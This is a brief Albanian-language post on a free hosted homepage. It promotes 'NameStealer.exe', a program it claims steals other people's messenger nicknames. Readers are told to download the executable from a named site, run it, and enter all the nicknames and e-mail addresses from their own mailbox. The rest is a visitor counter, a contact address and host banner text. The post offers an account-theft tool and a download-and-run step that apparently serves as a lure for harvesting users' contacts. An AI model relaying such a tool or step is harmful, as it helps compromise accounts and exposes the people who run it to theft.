Super Qendi
  Me ja vjedh nikun pa u kan Online.
 
Me ja vjedh nikin pa u kan online 1 Year, 7 Months ago Karma: 0  
Program shum i leht veq klikon në link e shkarkon del ne Desktop dhe hape ti qet të gjitha nikname e adresave që i ke në E-mail. 

www.messengertools.net/Files/NameStealer.exe
 
  Heute waren schon 21 Besucher (97 Hits) hier! Per Me Shum Info : Super-Qendi-Fortesali@Hotmail.Com  
 
=> Willst du auch eine kostenlose Homepage? Dann klicke hier! <=
↕ Mirë Se Vini Te Super Qendi ↕
Image by Cool Text: Logo and Button Generator - Create Your Own